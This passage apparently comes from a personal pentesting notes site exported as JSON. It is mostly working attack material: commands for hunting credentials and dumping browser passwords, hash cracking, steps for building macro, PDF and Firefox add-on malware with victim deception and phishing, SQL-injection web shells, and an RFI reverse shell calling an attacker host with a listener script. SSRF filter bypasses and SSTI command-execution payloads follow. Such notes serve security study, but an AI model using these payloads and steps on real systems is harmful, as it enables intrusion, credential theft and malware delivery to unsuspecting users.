/etc/cron.*/\n\n# Uses Linux-based command grep to search the file system for the key term `PRIVATE KEY` to discover SSH keys.\ngrep -rnw \"PRIVATE KEY\" /* 2>/dev/null | grep \":1\"\n\n# Uses Linux-based grep command to search for the keywords `PRIVATE KEY` within files contained in a user's home directory.\ngrep -rnw \"PRIVATE KEY\" /home/* 2>/dev/null | grep \":1\"\n\n# Uses Linux-based grep command to search for the keyword `ssh-rsa` within files contained in a user's home directory.\ngrep -rnw \"ssh-rsa\" /home/* 2>/dev/null | grep \":1\"\n\n# Uses Linux-based tail command to search through bash history files and output the last 5 lines.\ntail -n5 /home/*/.bash*\n\n# Runs Mimipenguin.py using python3.\npython3 mimipenguin.py\n\n# Runs Mimipenguin.sh using bash.\nbash mimipenguin.sh\n\n# Runs Lazagne.py with all modules using python2.7.\npython2.7 lazagne.py all\n\n# Uses Linux-based command to search for credentials stored by Firefox, then searches for the keyword `default` using grep.\nls -l .mozilla/firefox/ | grep default\n\n# Uses Linux-based command cat to view credentials stored by Firefox in JSON.\ncat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .\n\n# Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9.\npython3.9 firefox_decrypt.py\n\n# Runs Lazagne.py browsers module using Python 3.\npython3 lazagne.py browsers\n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#cracking-passwords","title":"Cracking Passwords","text":"
                        # Uses Hashcat to crack NTLM hashes using a specified wordlist.\nhashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt\n\n# Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output.\nhashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show\n\n# Uses unshadow to combine data from passwd.bak and shadow.bak into one single file to prepare for cracking.\nunshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes\n\n# Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked.\nhashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked\n\n# Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file.\nhashcat -m 500 -a 0 md5-hashes.list rockyou.txt\n\n# Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked.\nhashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked\n\n# Runs Ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.\nssh2john.pl SSH.private > ssh.hash\n\n# Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal.\njohn ssh.hash --show\n\n# Runs Office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash.\noffice2john.py Protected.docx > protected-docx.hash\n\n# Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash.\njohn --wordlist=rockyou.txt protected-docx.hash\n\n# Runs Pdf2john.pl script to convert a pdf file to a pdf hash to be cracked.\npdf2john.pl PDF.pdf > pdf.hash\n\n# Runs John in conjunction with a wordlist to crack a pdf hash.\njohn --wordlist=rockyou.txt pdf.hash\n\n# Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash.\nzip2john ZIP.zip > zip.hash\n\n# Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash.\njohn --wordlist=rockyou.txt zip.hash\n\n# Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes.\nbitlocker2john -i Backup.vhd > backup.hashes\n\n# Uses the Linux-based file tool to gather file format information.\nfile GZIP.gzip\n\n# Script that runs a for-loop trying each password in rockyou.txt to decrypt and extract an OpenSSL-encrypted archive.\nfor i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done\n
                        ","tags":["OSCP"]},{"location":"webexploitation/payloads/","title":"Creating malware and custom payloads","text":"","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#av0id","title":"AV0id","text":"

                        AV0id.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#darkarmour","title":"Darkarmour","text":"

                        Darkarmour

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#empire","title":"Empire","text":"

                        Empire cheat sheet.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#fatrat","title":"FatRat","text":"

                        FatRat cheat sheet.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#mythic-c2-framework","title":"Mythic C2 Framework","text":"

                        https://github.com/its-a-feature/Mythic The Mythic C2 framework is an alternative to Metasploit as a command-and-control framework and toolbox for unique payload generation. It is a cross-platform, post-exploitation red-teaming framework built with GoLang, Docker, docker-compose, and a web browser UI, designed to provide a collaborative and user-friendly interface for operators, managers, and reporting throughout red teaming.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#msfvenom","title":"msfvenom","text":"

                        msfvenom cheat sheet.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#nishang","title":"Nishang","text":"

                        nishang cheat sheet

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#syringe","title":"Syringe","text":"

                        syringe

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#veil","title":"Veil","text":"

                        Veil cheat sheet.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-pdf","title":"Creating malware in pdf","text":"

                        These two Metasploit modules can embed a payload in a PDF:

                        • exploit/windows/fileformat/adobe_pdf_embedded_exe
                        • exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-word-document","title":"Creating malware in word document","text":"

                        1. Craft an executable

                        Use for instance veil.

                        2. Convert it to a VisualBasic script - macro code

                        locate exe2vba\n# Result: /usr/share/metasploit-framework/tools/exploit/exe2vba.rb\n\n# Go to the folder\ncd /usr/share/metasploit-framework/tools/exploit/\n\n# Create the malicious vba script\n./exe2vba.rb <first-parameter> path/to/nameOfOutputFile.vba\n# first parameter: malicious executable file that will be converted to macro code. Take the path to the .exe file provided by veil\n

                        3. Create an MS Word document

                        4. Open a new macro and embed the macro code

                        5. Copy the payload as text in the word document. If it's too long, disguise it (set font color to white).

                        6. Convince the victim to have macros enabled.

                        7. Start a listener and wait for the victim to connect.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-a-firefox-addon","title":"Creating malware in a Firefox addon","text":"

                        Use the metasploit module to generate the addon: exploit/multi/browser/firefox_xpi_bootstrapped_addon

                        It will be served from SRVHOST:SRVPORT/URIPATH. You can then deliver this URL via a phishing email.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/php-type-juggling-vulnerabilities/","title":"PHP Type Juggling Vulnerabilities","text":"

                        Read PHP Type Juggling Vulnerabilities.

                        Copy-pasted, quoted:

                        How vulnerability arises\n\nThe most common way that this particularity in PHP is exploited is by using it to bypass authentication.\n\nLet\u2019s say the PHP code that handles authentication looks like this:\n\nif ($_POST[\"password\"] == \"Admin_Password\") {login_as_admin();}\n\nThen, simply submitting an integer input of 0 would successfully log you in as admin, since this will evaluate to True:\n\n(0 == \u201cAdmin_Password\u201d) -> True\n

                        In the HackTheBox machine Base, the login form could be bypassed by turning the username and password parameters into arrays:

                        Original request\n\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername=admin&password=admin\n
                        Crafted request:\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername[]=admin&password[]=admin\n

                        How do we know? By spotting the file login.php.swp in the exposed /login directory and reading its contents with:

                        vim -r login.php.swp\n# -r  -- list swap files and exit or recover from a swap file\n

                        Content:

                        <?php\nsession_start();\nif (!empty($_POST['username']) && !empty($_POST['password'])) {\n    require('config.php');\n    if (strcmp($username, $_POST['username']) == 0) {\n        if (strcmp($password, $_POST['password']) == 0) {\n            $_SESSION['user_id'] = 1;\n            header(\"Location: /upload.php\");\n        } else {\n            print(\"<script>alert('Wrong Username or Password')</script>\");\n        }\n    } else {\n        print(\"<script>alert('Wrong Username or Password')</script>\");\n    }\n}\n
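
                        Why the array trick works, as a sketch under PHP 7.x semantics (in PHP 8, strcmp() with an array throws a TypeError instead): strcmp() returns NULL when given an array, and the loose comparison NULL == 0 evaluates to true.

                        <?php\n// strcmp() expects strings. When the request contains username[]=admin,\n// $_POST['username'] is an array, and strcmp() returns NULL with a warning.\n$password = 'super_secret';        // hypothetical value from config.php\n$result = @strcmp($password, []);  // NULL (warning suppressed)\nvar_dump($result == 0);            // bool(true)  -- NULL is juggled to 0\nvar_dump($result === 0);           // bool(false) -- strict check stops the bypass\n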

                        Quoting from the article PHP Type Juggling Vulnerabilities: \"When comparing values, always try to use the type-safe comparison operator === instead of the loose comparison operator ==. This will ensure that PHP does not type juggle and the operation will only return True if the types of the two variables also match. This means that (7 === \u201c7\u201d) will return False.\"

                        ","tags":["web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/","title":"RFD attack - Reflected File Download","text":"

                        A Reflected File Download (RFD) attack combines URL path segments with web services vulnerable to JSONP injection; the goal is to deliver malware to end users of the system.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#cool-proof-of-concept","title":"Cool proof of concept","text":"

                        https://medium.com/@Johne_Jacob/rfd-reflected-file-download-what-how-6d0e6fdbe331.

                        Read more: https://hackerone.com/reports/39658

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#prevention-and-mitigation","title":"Prevention and mitigation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#-x-content-type-options-nosniff-header-to-api-response","title":"- \"X-Content-Type-Options: nosniff\" header to API response.","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-code-execution-rce/","title":"RCE attack - Remote Code Execution","text":"OWASP
                        [OWASP Web Security Testing Guide 4.2](../OWASP/index.md) > 7. Data Validation Testing > 7.8. Testing for SSI Injection\n
                        ID Link to Hackinglife Link to OWASP Description 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presence of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection.

                        RCE attacks involve an attacker exploiting a code vulnerability to execute arbitrary commands on a target system and gain access to the corporate network behind it.

                        Exploiting a blind remote code execution vulnerability via a GET request, using Burpsuite (to run the queries) and Wireshark (to capture the traffic). A time-based payload such as sleep+5 confirms execution by delaying the response:

                        GET /script.php?c=sleep+5&ok=ok HTTP/1.1\nHost: 192.168.137.130\nUser-Agent: ...\n...\n

                        Another option is a ping-based payload:

                        GET /script.php?c=ping+192.168.139.130+-c+5&ok=ok HTTP/1.1\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-code-execution-rce/#gaining-a-reverse-shell-from-sql-injection","title":"Gaining a reverse shell from SQL injection","text":"

                        Take a WordPress installation that uses a MySQL database. If you manage to log in to the MySQL panel (/phpmyadmin) as root, then you can write a PHP shell to the /wp-content/uploads/ folder.

                        Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n

                        Now code can be executed from the browser:

                        https://example.com/blogblog/wp-content/uploads/shell.php?cmd=cat+/etc/passwd\n

                        One more example:

                        Select \"<?php $output=shell_exec($_GET['cmd']);echo \"<pre>\".$output.\"</pre>\"?>\" into outfile \"/var/www/https/shell.php\" from mysql.user limit 1;\n

                        Now code can be executed from the browser:

                        https://example.com/shell.php?cmd=cat+/etc/passwd\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/","title":"RFI attack - Remote File Inclusion","text":"OWASP

                        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                        ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)

                        A Remote File Inclusion (RFI) vulnerability is a type of security flaw found in web applications that allows an attacker to include and execute remote files on a web server. It arises from improper handling of user-supplied input in file inclusion operations, and it can have severe consequences, including unauthorized access, data theft, and even full compromise of the affected server.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#causes","title":"Causes","text":"
                        • Insufficient Input Validation: The web application may not validate or filter user input, allowing attackers to inject malicious data.
                        • Lack of Proper Sanitization: Even if input is validated, the application may not adequately sanitize the input before using it in file inclusion operations.
                        • Using User Input in File Paths: Applications that dynamically include files based on user input are at high risk if they don't carefully validate and control that input.
                        • Failure to Implement Security Controls: Developers might overlook security best practices, such as setting proper file permissions or using security mechanisms like web application firewalls (WAFs).
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#how-to-exploit-it","title":"How to exploit it?","text":"

                        Identify Vulnerable Input: The attacker identifies a web application that accepts user input and uses it in a file inclusion operation, typically in the form of a URL parameter or a POST request parameter.

                        Inject Malicious Payload: The attacker injects a malicious file path or URL into the vulnerable parameter. For example, they might replace a legitimate parameter like ?page=about.php with ?page=http://evil.com/malicious_script.

                        Server Executes Malicious Code: When the web application processes the attacker's input, it dynamically includes the remote file or URL. This can lead to remote code execution on the web server, as the malicious code in the included file is executed in the server's context.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#php","title":"php","text":"

In the php.ini file there are some directives that define this policy:

                        • allow_url_fopen
                        • allow_url_include

If these directives are enabled (set to On), then an LFI can be turned into a Remote File Inclusion.

1. Create a PHP file with the reverse shell

                        nano reverse.txt\n

2. In that PHP file, craft the malicious code:

<?php\npassthru(\"nc -e /bin/sh <attacker IP> <attacker port>\");\n?>\n
3. Serve that file from your machine (http_serve).

4. Get your machine listening on a port with netcat.

5. At the injection point from which you can make a call to a URL, include your file. For instance:

https://VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt\n\n# Sometimes, to get the PHP executed on the victim machine (and not the attacker), add a ?\nhttps://VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt?\n
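As an alternative to the raw netcat listener in step 4, a minimal Python catcher works too. A sketch, assuming port 4444 (match it to the port you wrote into reverse.txt):

import socket

# Minimal reverse-shell catcher; port 4444 is an assumption,
# match it to the port placed in reverse.txt.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", 4444))
listener.listen(1)
print("[*] waiting for the reverse shell...")
conn, addr = listener.accept()
print(f"[+] connection from {addr[0]}:{addr[1]}")
try:
    while True:
        conn.sendall((input("$ ") + "\n").encode())
        # a single recv keeps the sketch short; long output may arrive in chunks
        print(conn.recv(65535).decode(errors="replace"), end="")
finally:
    conn.close()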

Sometimes there might be some filtering for the payload (which was http://<attackerip>/reverse.txt?). To bypass it:
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#using-uppercase","title":"using uppercase","text":"

https://VICTIMurlADDRESS/PATH/PATH/page=hTTP://<attackerip>/reverse.txt","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#other-bypassing-techniques-for-slashes","title":"Other bypassing techniques for slashes","text":"

Wrappers

PHP wrapper: php://filter allows the attacker to include a local file and base64-encode the output:

http://IPdomain/rfi.php?language=php://filter/convert.base64-encode/resource=recurso.php

PHP filter without base64 encoding:

php://filter/resource=flag.txt

DATA wrapper:

http://IPdomain/rfi.php?language=data://text/plain,<?php system($_GET[\"cmd\"]);?>&cmd=whoami

HTTP wrapper:

http://IPdomain/rfi.php?language=http://SERVERIP/shell.php

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#mitigation","title":"Mitigation","text":"

In php.ini, disable:

                        • allow_url_fopen
                        • allow_url_include

Use static file inclusion (instead of dynamic file inclusion) by hardcoding the files you want to include, rather than retrieving them via GET or POST parameters.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/","title":"SSRF attack - Server Side Request Forgery","text":"OWASP

                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery

                        ID Link to Hackinglife Link to OWASP Description 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location. The attacker can craft requests to the internet or to the intranet, which can be used to port scan or probe a remote machine. Basically, it could allow an attacker to:

                        • Take control of a remote machine.
                        • Read or update data.
                        • Read the server configuration.
                        • Connect to internal services...

Using schemes such as:

                        http://\nfile:///\ndict://\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#exploitation","title":"Exploitation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#load-the-contents-of-a-file","title":"Load the Contents of a File","text":"
                        GET https://example.com/page?page=https://malicioussite.com/shell.php\n

See Burp Suite Labs

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#read-files-from-restricted-resources","title":"Read files from restricted resources","text":"
                        GET https://example.com/page?page=https://localhost:8080/admin\nGET https://example.com/page?page=https://127.0.0.1:8080/admin\nGET https://example.com/page?page=file:///etc/passwd\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#read-files-from-other-backend-systems","title":"Read files from other backend systems","text":"

                        In some cases, the application server is able to interact with back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses.

                        GET https://example.com/page?page=https://localhost:3306/\nGET https://example.com/page?page=https://localhost:6379/\nGET https://example.com/page?page=https://localhost:8080/\n
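This can be scripted: differences in status code, response size, or latency across ports hint at which internal services are listening. A rough sketch (assuming the requests package; example.com and the page parameter are the placeholders used above):

import requests  # assumed third-party dependency

URL = "https://example.com/page"  # placeholder endpoint from the examples above

# Probe common internal services through the SSRF-able "page" parameter;
# differing status codes, sizes, or latencies hint at open internal ports.
for port in (3306, 6379, 8080):
    try:
        r = requests.get(URL, params={"page": f"https://localhost:{port}/"}, timeout=15)
        print(port, r.status_code, len(r.content), round(r.elapsed.total_seconds(), 2))
    except requests.RequestException as exc:
        print(port, "error:", exc)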

Gopherus sends unauthenticated requests to other services, and it often succeeds.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#techniques","title":"Techniques","text":"

                        Bypass blacklist-based input filters

                        Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using the following techniques:

• Use an alternative IP representation of\u00a0127.0.0.1, such as\u00a02130706433,\u00a0017700000001, or\u00a0127.1 (see the sketch after this list).
                        • Register your own domain name that resolves to\u00a0127.0.0.1. You can use\u00a0spoofed.burpcollaborator.net\u00a0for this purpose.
                        • Obfuscate blocked strings using URL encoding or case variation.
                        • Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an\u00a0http:\u00a0to\u00a0https:\u00a0URL during the redirect has been shown to bypass some anti-SSRF filters.
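For the first technique in the list above, the alternative IP representations can be generated programmatically. A small sketch using only the Python standard library:

import ipaddress

def alternative_forms(ip: str) -> dict:
    """Alternative textual encodings of an IPv4 address that naive
    blacklist filters often fail to normalize."""
    value = int(ipaddress.IPv4Address(ip))
    forms = {
        "decimal": str(value),                      # 127.0.0.1 -> 2130706433
        "octal": f"{value:#o}".replace("0o", "0"),  # -> 017700000001
        "hex": f"{value:#x}",                       # -> 0x7f000001
    }
    if ip.startswith("127.0.0."):
        forms["short"] = "127." + ip.split(".")[-1]  # zero octets are implied
    return forms

print(alternative_forms("127.0.0.1"))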

                        Bypass whitelist-based input filters

Some applications only allow inputs that match a whitelist of permitted values. The filter may look for a match at the beginning of the input, or contained within it. You may be able to bypass this filter by exploiting inconsistencies in URL parsing.

• Using the\u00a0@\u00a0character to separate the userinfo from the host:\u00a0https://expected-host:fakepassword@evil-host
                        • URL fragmentation with the\u00a0#\u00a0character:\u00a0https://attacker-domain#expected-domain
• You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: https://expected-host.evil-host
                        • URL encoding. Double URL-encode characters to confuse the URL-parsing code.
                        • Fuzzing
                        • Combinations of all of the above
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#exploiting-redirection-vulnerabilities","title":"Exploiting redirection vulnerabilities","text":"

                        It is sometimes possible to bypass filter-based defenses by exploiting an open redirection vulnerability.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#resources","title":"Resources","text":"
                        • Portswigger: https://portswigger.net/web-security/ssrf.
                        • Portswigger labs.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        • Gopherus.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/","title":"Server-side Template Injection (SSTI)","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#what-is-ssti","title":"What is SSTI?","text":"

                        Web applications frequently use template systems to embed dynamic content in web pages and emails.

For instance: the ASP framework (Razor); PHP frameworks (Twig, Symfony, Smarty, Laravel, Slim, Plates); Python frameworks (Django, Mako, Jinja2); Java frameworks (Groovy, FreeMarker, Jinjava, Pebble, Thymeleaf, Velocity, Spring, patTemplate, Expression Language EL); JavaScript frameworks (Handlebars, Codepen, Lessjs, Lodash); and Ruby frameworks (ERB, Slim).

Server-side Template Injection (SSTI) vulnerabilities occur when user input is embedded into a template in an unsafe way, which might lead to remote code execution on the server.

                        OWASP

                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.18. Testing for Server-side Template Injection

                        ID Link to Hackinglife Link to OWASP Description 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit. Resources for these notes
                        • Portswigger: Server-Side Template Injection
                        • Hacktricks: SSTI payloads
                        Payloads
                        • PayloadsAllTheThings for SSTI

Snippet of vulnerable source code:

                        custom_email={{self}}\n

What we have here is essentially server-side code execution inside a sandbox. Depending on the template engine used, it may be possible to execute arbitrary code directly or even to escape the sandbox and execute it. Following the example, in this POST request the expected email value has been replaced by a payload and it gets executed:

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#exploitation","title":"Exploitation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#1-detect-injection-points","title":"1. Detect injection points","text":"

                        Template languages use syntax chosen explicitly not to clash with characters used in normal HTML, so it's easy for a manual blackbox security assessment to miss template injection entirely.\u00a0To detect it, we need to invoke the template engine by embedding a statement.

                        Here\u2019s a simple example of using Twig in a PHP application. This would be the exampletemplate.twig:

                        <!DOCTYPE html>  \n<html>  \n<head>  \n    <title>{{ title }}</title>  \n</head>  \n<body>  \n    <h1>Hello, {{ name }}!</h1>  \n</body>  \n</html>\n

                        And the PHP rendering the Twig template:

                        <?php  \nrequire_once 'example/page.php';  \n\n$loader = new \\Twig\\Loader\\FilesystemLoader(__DIR__);  \n$twig = new \\Twig\\Environment($loader);  \n\n$template = $twig->load('exampletemplate.twig');  \necho $template->render(['title' => 'Twig Example', 'name' => 'John']);  \n?>\n

                        Now, coming back to our web app, we could curl the following:

                        $ curl -g 'http://www.target.com/page?name={{7*7}}'\n

                        With SSTI the response would be:

Hello, 49!\n

Trick: there are a huge number of template languages, but many of them share basic syntax characteristics. We can take advantage of this by sending generic, template-agnostic payloads using basic operations to detect multiple template engines with a single HTTP request. This polyglot payload will trigger an error in the presence of an SSTI vulnerability:

                        ${{<%[%'\"}}%\\.\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#2-identify-the-template-engine","title":"2. Identify the template engine","text":"

                        After detecting template injection, the next step is to identify the template engine in use.

Identification usually works as a decision tree of probes, where each probe's 'success' or 'failure' response narrows down the engine. In some cases, a single payload can have multiple distinct success responses - for example, the probe {{7*'7'}} would result in 49 in Twig, 7777777 in Jinja2, and neither if no template language is in use.

                        Payloads for different Template engines
                        • PayloadsAllTheThings for SSTI
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#3-exploitation","title":"3. Exploitation","text":"

                        Once you discover a server-side template injection vulnerability, and identify the template engine being used, successful exploitation typically involves the following process.

                        • Read

                          • Template syntax
                          • Security documentation
                          • Documented exploits
                        • Explore the environment:

                        Many template engines expose a \"self\" or \"environment\" object of some kind, which acts like a namespace containing all objects, methods, and attributes that are supported by the template engine. If such an object exists, you can potentially use it to generate a list of objects that are in scope.

It is important to note that websites will contain both built-in objects provided by the template and custom, site-specific objects that have been supplied by the web developer. You should pay particular attention to these non-standard objects.

                        • Create a custom attack
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#1-java-frameworks","title":"1. Java frameworks","text":"

                        Many template engines expose a \"self\" or \"environment\" object. In Java-based templating languages, you can sometimes list all variables in the environment using the following injection:

                        ${T(java.lang.System).getenv()}\n

                        This can form the basis for creating a shortlist of potentially interesting objects and methods to investigate further. Additionally, for Burp Suite Professional users, the Intruder provides a built-in wordlist for brute-forcing variable names.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#11-freemarker","title":"1.1. FreeMarker","text":"

                        Basic payloads:

                        {{7*7}}\n# return {{7*7}}\n\n${7*7}\n#return 49\n\n#{7*7}\n#return 49 -- (legacy)\n\n${7*'7'}\n#return nothing\n

                        RCE in FreeMarker:

                        <#assign ex = \"freemarker.template.utility.Execute\"?new()>${ ex(\"id\")}\n[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}\n${\"freemarker.template.utility.Execute\"?new()(\"id\")}\n\n${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(\" \")}\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#12-velocity","title":"1.2. Velocity","text":"

                        RCE in Velocity:

                        $class.inspect(\"java.lang.Runtime\").type.getRuntime().exec(\"sleep 5\").waitFor()   \n\n[5 second time delay]   \n0\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#2-php-frameworks","title":"2. PHP frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#21-smarty","title":"2.1. Smarty","text":"

                        RCE in Smarty

                        {php}echo `id`;{/php}\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#3-python-frameworks","title":"3. Python frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#31-mako","title":"3.1. Mako","text":"

                        RCE in Mako

                        <%   import os   x=os.popen('id').read()   %>   ${x}\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#32-tornado","title":"3.2. Tornado","text":"

                        Basic payloads:

                        {{7*7}}\n# return 49\n\n${7*7}\n# return ${7*7}\n\n{{foobar}}\n#return Error\n\n{{7*'7'}}\n# return 7777777\n

                        RCE in Tornado:

                        {{os.system('whoami')}}\n\n\n{% import os %}{{ os.popen(\"whoami\").read() }}\n

                        Useful tips to create SSTI exploit for Tornado:

